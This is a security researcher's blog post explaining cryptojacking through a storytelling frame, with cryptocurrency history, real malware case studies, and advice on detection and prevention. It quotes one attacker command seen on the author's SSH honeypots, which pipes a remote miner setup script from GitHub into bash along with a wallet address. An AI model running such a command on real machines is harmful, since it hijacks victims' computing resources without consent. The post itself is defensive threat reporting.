SSH honeypot, deployed in the wild, collecting and sharing data

Cryptojacking: a tale of riches, deceit, and theft

31 Jul 2021 • 14 min read

Cryptocurrency coins

TL;DR

Too long; didn't read, version:

Cryptojacking (a portmanteau of "cryptocurrency" and "hijacking") involves a threat actor maliciously obtaining cryptocurrency coins (such as bitcoin, ethereum, monero, etc). The attack typically involves hijacking a device (such as a computer, phone, tablet, server, etc) and using its resources to mine cryptocurrency. Cryptojacking can also involve altering an existing mining device's wallet ID to get mined coins.

Contents

Intro

In today's blog post we'll explore what cryptojacking is, why cybercriminals are motivated by cryptocurrency mining attacks, and we'll look at real-world attacks.

Why? Well, cryptojacking was big business for cybercriminals in 2017 and 2018. But died down in 2019 after Coinhive shut down. Now, in 2021, Cryptojacking attacks are on the rise again (see report by Kaspersky).

I've noticed this trend of cryptojacking attacks targetting my honeypots (see my last 2 blog posts: Cryptojacking Attacks Continue To Target SSH Servers and Sneaky Malware Reconfigures Hive OS Wallet for Profit). I want to understand more about cryptojacking and why it's on the rise.

So, grab yourself a coffee (or a hot chocolate), find yourself a comfy spot, and I'll put on my best John Hurt storytelling voice...

*clears throat*

Setting the scene

I would like, if I may, to take you on a journey into the depths of cryptojacking. A luxurious world of riches; shrouded in deceit and theft.

We begin our journey with Alicia. She's a cryptocurrency miner. But she has a problem: she's hungry. So, to solve her problem, she calls a local takeaway.

Alicia
Meet Alicia, she's hungry.

"Hey, you've reached to Bob's Pizzas -- may I take your order please?"

Bob
Meet Bob, he sells pizza.

"Hey, can I get a medium Hawaiian pizza (with extra pineapples)", Alicia asked.

"No worries, that'll be $15.80. How would you like to pay?"

----------

But there's another problem. Alicia doesn't know -- or trust -- Bob's Pizzas. And, equally, Bob's Pizzas, doesn't know or trust Alicia.

Alicia doesn't have any cash on her, and she doesn't trust Bob's Pizzas to process her credit card.

Despite Bob's persuasive words (and surprisingly convincing, dulcet tones), Alicia is, in fact, rather worried that every little thing is not going to be alright.

Perhaps Alicia could buy Bob's pizza with that anonymous, digital currency she's been mining?

A brief history of cryptocurrency

In 2008, a paper titled "Bitcoin - A Peer to Peer Electronic Cash System", written by someone calling themselves Satoshi Nakamoto, was posted to a mailing list discussion on cryptography. The author's real identity remains a mystery to this day.

The concept of bitcoin is basically a virtual currency (like an online version of cash). People can send bitcoins to your wallet, and you can send bitcoins to other people. Each bitcoin is basically a computer file which is stored in a digital wallet. All bitcoin transactions are recorded in a public database, called the blockchain.

A year after Satoshi Nakamoto released his paper about bitcoin, the concept of "mining" -- to get your very own shiny pieces of bitcoin -- is introduced to the tech community. The Bitcoin software is released for public use, allowing anyone with spare processing power to create their own coins, and record transactions in the public ledger.

Bitcoin mining basically involves a computer calculating incredibly difficult sums -- processing transactions for everybody. Occasionally, a miner is rewarded with a bitcoin for their calculations.

The "crypto" in cryptocurrency refers to the various encryption algorithms and cryptographic techniques that protect entries in the ledger. Cryptocurrency uses elliptical curve encryption, public-private key pairs, and hashing functions. Ledger entries are stored securely in the blockchain. The blockchain is essentially a database of transactions that cannot be altered (due to its cryptographic nature).

This process of distributing cryptocurrencies across a large number of computers (i.e. everyone shares the workload) means it's decentralised. Therefore, no single person or organisation has control -- cryptocurrencies exist outside the control of governments and central authorities.

In 2010, bitcoin had only ever been mined, and never traded; so no-one knew its value. That's when Laszlo Hanyecz decided to buy 2 pizzas for 10,000 bitcoin. A pretty sweet deal when you consider the relatively low effort and cost required to mine those coins in 2010! Although, if Hanyecz had kept hold of those bitcoins, at today's price, they would be worth more than $100 million. That's some expensive pizza tastes, Hanyecz!

In 2011, various bitcoin rivalries started to emerge. These were generally known as altcoin and usually offered some advantage over bitcoin such as increased efficiency or privacy. Among the first to emerge were Litecoin and Namecoin.

In 2013, things start to get interesting for bitcoin. It reached a value of $1,000 for the first time. But then proceeded to crash down to $300. For early investors, this was a bad time. And it took nearly 2 years for the price of bitcoin to climb back up to $1,000 again.

----------

Now, back to Alicia's predicament. She's hungry, she wants to buy a pizza from Bob, but neither Alicia nor Bob trust each other.

We can solve this problem -- of trust and anonymity -- using cryptocurrency and the blockchain. Alicia can pay for her pizza by sending the requirement amount of bitcoin to Bob.

Alicia can make her bitcoin purchase using her wallet's private key to record a transaction in the lodger (stored securely in the blockchain). The ledger shows how much she paid, and who she paid -- using Bob's public key to identify Bob. Then, Bob can verify Alicia's purchase by looking up Alicia's public key in the blockchain.

But, there's another problem. Alicia doesn't have enough funds in her cryptocurrency wallet. "That's strange", she thought. "My computer's been mining bitcoin for weeks. There should be loads of money in there!"

Introducing Mallory

So, cryptocurrency is an anonymous, decentralized form of electronic currency that's secured by a series of records called the blockchain.

Despite having no intentions of criminal use, cryptocurrency has, unfortunately, become synonymous with crime. Its anonymous nature makes it a lucrative choice for profit-driven criminals.

In 2014, a rise in scams and theft started to hit bitcoin. The world's largest bitcoin exchange (at the time), Mt Gox went offline, and 850,000 bitcoins went missing. Those coins were valued at 450 million dollars at the time. In today's value, they'd be worth an eye-watering $32 billion dollars. Only 200,000 of the missing coins were recovered. Nedless to say, the Mt. Gox bitcoin exchange never recovered from the attack.

Fast forward to today, and the amount of resources needed to mine new cryptocurrency coins (especially for popular coins, like bitcoin) is high. According to Miner Daily, it currently costs (as of May 2021) between $7,000 and $11,000 to mine a single bitcoin. 1 bitcoin is currently worth about $38,000 (at time of writing).

----------

Meanwhile, in a dark and dingy basement, somewhere across the world, Mallory glances at her $150,000 Rolex. Wondering if she should check-in on her latest project, Mallory scoops another mouthful of caviar, puts the diamond-encrusted jar to one side, looks over both shoulders, and finally logs into her vibranium-coated computer [I may have gone too far with that last one].

Mallory can be a little, shall we say, on edge. She very much enjoys the finer things in life. A little bit of luxury makes for a happy Mallory. But Mallory's happiness does somewhat come at the expense of the happiness of others'.

Mallory has over 10,000 bitcoins in her wallet -- which is worth a whopping $344 million! But here's the interesting part: Mallory has never mined any bitcoin. Well, she has never mined an of her own bitcoin.

You see, Mallory is a cybercriminal. She deceives people and steals mining resources. Relying on the anonymous nature of cryptocurrency to bask in her riches.

And what is Mallory's modus operandi, I hear you ask? Cryptojacking.

Mallory
Meet Mallory, she's a cryptojacking cybercriminal.

What is cryptojacking?

Cryptojacking is a portmanteau of the words "cryptocurrency" and "hijacking". As the name suggests, it involves a malicious actor -- in our case: Mallory -- obtaining coins without mining on her own equipment.

Cryptojacking comes in many forms. It often involves hijacking a device (such as a computer, phone, tablet, server, etc) -- then using its resources to mine cryptocurrency. The best cryptojacking attacks go unnoticed to their victims; generating a continuous flow of coins into Mallory's wallet.

Threat actors, like Mallory, are motived to carry out cryptojacking attacks because mining is expensive. As we saw earlier, it currently costs about $7,000-$8,000 to mine a single bitcoin. Even with it's current price of $38,000 for 1 bitcoin, miners need to spend money -- usually in electricity costs -- to generate coins. What's more, the value of bitcoin can fluctuate wildly, adding financial risk.

So, it's much easier for Mallory to mine on other peoples' devices -- leaving them to pay the electricity bill. Plus, due to its anonymous nature, cryptojackers can be difficult to track down.

Another cryptojacking-trick up Mallory's sleeve involves discretely changing a mining device's wallet ID to hers. As we learnt earlier, the security of cryptocurrency relies of cryptography. So a miner's private key is what assigns mined coins their wallet. When Alicia mines cryptocurrency, her private key ensures she receives her mined rewards. But if that private key is altered, then Alicia will no-longer receive mined coins.

This is what Mallory did to Alicia a few weeks ago. Mallory leveraged an exploit on Alicia's mining rig to break into her system. Once inside, Mallory deployed malware that swapped Alicia's private key for Mallory's own private key. So, since that attack, Alicia's rig has been mining coins for Mallory -- while Alicia has been paying the electricity costs.

When Alicia went to pay for her pizza, she didn't have enough funds in her cryptocurrency wallet. Yes, Alicia's rig had been successfully mining coins for weeks. But, those coins were going into Mallory's wallet -- not Alicia's.

Real-world cryptojacking attacks

So now we have a batter understanding of what cryptojacking is, and why cybercriminals are motivated by cryptocurrency, let's explore some real-world cryptocurrency mining attacks.

Coinhive

Which brings us to the infamous Coinhive. Launched in 2017, Coinhive offered website owners the ability to make money by mining a type of cryptocurrency called Monero. The Coinhive service worked by running JavaScript code in visitors' browsers. So, when a user visited the website, their computer would begin mining Monero coins for the website owner.

Some sites were upfront and honest with their visitors -- explaining that content could be viewed in exchange for mining Monero coins for the website's owners. However, many websites snuck the Monero-mining JavaScript into their site without informing visitors.

Things took a turn for the worse when threat actors began deploying Coinhive to websites without permission. Meaning that neither visitors, nor website owners, realised they were mining Monero for cybercriminals. This lead to antivirus vendors and ad-blockers tdentifying and removing Coinbase code from infected websites.

Numerous cryptojacking attacks leveraged Coinhive, including:

  • In 2018, Coinhive code was discovered in the Los Angeles Times' Homicide Report Page (reported by TechRepublic)
  • In 2018, Coinhive code was found running on YouTube ads through Google's ad network (reported by Ars Technica).
  • In 2018, it was discovered that over 200,000 MikroTik routers were infected with Coinhive (reported by ZDNet)
  • In 2019, 8 apps were removed from the Microsoft Store for secretly mining Monero coins with Coinhive (discoverd by Symantec)

Coinhive shut-down on 8 March 2019, as reported by ZDNet. Interestingly, Troy Hunt took over the Coinhive domain in May 2020 and produced some interesting insights on his blog earlier this year.

Prometei

First discovered in July 2020, Prometei is a modular, multi-stage cryptocurrency botnet that runs on both Windows and Linux. This clever malware uses different tools and techniques such as Mimikatz (credential stealing tool), SMB (protocol for sharing files, printers, etc), and RDP (remote desktop protocol) exploits. It's possible that Prometei dates back to 2016, and has been evolving its arsenal of attack methodology since (see reports by Cyberteam and Talos).

PowerGhost

Discovered in 2018, PowerGhost is a fileless malware that infects its victims with a cryptocurrency miner. The malware begins with an obfuscated PowerShell script that contains the core code and additional modules for mining (see reports by The Cyber Threat Alliance (CTA), Kaspersky and ZDNet).

Graboid

Discovered in 2019, Graboid is a cryptojacking worm that spreads via containers in the Docker Engine. Graboid can be difficult to detect since most endpoint protection software doesn't inspect data or activities inside containers (see report by Palo Alto Networks).

In 2020, Palo Alto Networks also discovered a malicious Docker Hub account (azurenql) that had shared 6 malicious cryptocurrency mining images to over 2 million pull requests. One of the wallet IDs associated with the malware had earned more than 525.38 XMR (Monero) -- worth over $115,000 at today's exchange rate (see report by Palo Alto Networks).

My recent Honeypot observations

I've been observing numerous cryptojacking attacks on my honeypots recently. For example, I discovered malware that alters wallet IDs on mining rigs powered by Hive OS (a popular mining operating system built on Ubuntu 16.04 LTS). Resulting in mined Bitcoin and Ethereum coins being sent to the attackers' wallets (see Cryptojacking Attacks Continue To Target SSH Servers).

Another recent example that keeps reappearing on my SSH honeypots is when threat actors deploy the following bash command:

curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

The above bash code downloads a legitimate miner from GitHub, which then turns the victim machine into an active miner, without the owner's consent. The technique of threat actors hosting cryptocurrency mining malware on GitHub was first reported by Avast in 2018 (see report).

For further reading on the rising trend of cryptocurrency mining attacks I recommend The Illicit Cryptocurrency Mining Threat (PDF) by The Cyber Threat Alliance. Although bear in mind the report was published before Coinhive shut down. A more recent report by Kaspersky was released earlier this year.

----------

But wait, what about Alicia and her pizza? Well, unfortunately for Alicia, she'll have to find another way to pay. But she's learnt to be more careful -- and more secure -- with her mining.

There are countless Mallorys, motivated by cryptocurrency riches, targetting individuals and organisations around the world -- often without the victims noticing.

It's possible that cryptojacking attacks are rising alongside the worth of cryptocurrencies, such as bitcoin (although, bitcoin's worth does tend to crash a lot too). Cryptojacking may be more lucrative for profit-driven cybercriminals compared to other cyber attacks such as ransomware. Especially considering a hijacked device will continue mining indefinitely if unnoticed. However, don't forget, there are also non-monetary-driven threat actors out there -- such as state-sponsored attacks -- that have bigger fish to fry.

How to detect cryptojacking

How do you know if you're a victim of cryptojacking? Well, attacks can be difficult to detect; many attacks slip past antivirus solutions because the cryptojacking attacks leverage legitimate mining software. So, here are some signs to look out for:

Slow device

Since cryptocurrency mining takes up significant resources, a device that's been hijacked may seem slower than normal. Look for signs that your device is working harder than it should. Sometimes it may just be that your computer is busy with legitimate tasks, but always investigate sudden changes. Other signs may include:

  • Overheating
  • Loud fan noise
  • High CPU load
  • System keeps crashing
  • Slow loading apps

Wallet ID changes

If you run a mining rig, check to see if your cryptocurrency wallet has been altered without your permission. If it has, this may be a sign that your rig has been compromised. Other signs may include:

  • Mining slowdown
  • Rig keeps restarting*
  • High rig operating costs with low mining output

*I recently discovered malware targetting Hive OS on my honeypot. It would restart the mining process every hour to ensure the attacker's wallet ID stayed in place (see Sneaky Malware Reconfigures Hive OS Wallet for Profit). The malware needs to be properly removed, along with any maliciously created user accounts, before the correct wallet ID can be put back (otherwise the malware will keep changing the wallet ID).

How to protect yourself from cryptojacking attacks

Although cryptojacking attacks can be difficult to detect, there are some basic steps you can take to protect yourself from an attack in the first place.

Be aware of phishing attacks

Phishing attacks are a common deployment vector for many types of cyber attacks -- not just cryptojacking. Phishing emails often use a variety of techniques which makes them difficult to spot. Protecting your accounts with multi-factor authentication (MFA) makes it harder for criminals to gain access to your accounts -- even if they do get your username and password.

Disable JavaScript

Many cyberattacks leverage JavaScript to deploy their malicious code (such as drive-by-download attacks). Browser plug-ins such as NoScript and SafeScript will block all JavaScript except from domains on a safe list.

Use an ad-blocker

Although not as effective as a JavaScript blocker at removing malicious code, ad-blockers should prevent most malicious advertising code running on your device. Browser Plug-ins such as AdBlock, uBlock, AdGuard, etc. are good choices.

Use strong passwords / key authentication

Recent attacks I observed on my SSH honeypots leveraged weak authentication to deploy their cryptojacking malware. Some mining software comes with weak credentials as default (e.g. username: "user", password: "1"). Always change default credentials to strong passwords. For SSH servers, disable password authentication altogether, and use key authentication instead (if you can). As previously mentioned, use MFA for enhanced account security.

Sources:

Special guest appearances from Alicia Keys and Bob Marley.

Any references to historical events, real people, or real locales are used fictitiously. Other names, characters, places, and incidents are the product of the author's imagination, and any resemblance to actual events or locales or persons, living or dead, is entirely coincidental (thanks Rasputin).

Main image credit: Cryptocurrency coins. by Jievani Weerasinghe.

About the author

Simon BellSimon Bell is an award-winning Cyber Security Researcher, Software Engineer, and Web Security Specialist. Simon's research papers have been published internationally, and his findings have featured in Ars Technica, The Hacker News, PC World, among others. He founded Secure Honey, an open-source honeypot and threat intelligence project, in 2013. He has a PhD in Cyber Security from Royal Holloway's world-leading Information Security Group.

Follow Simon on Twitter: @SimonByte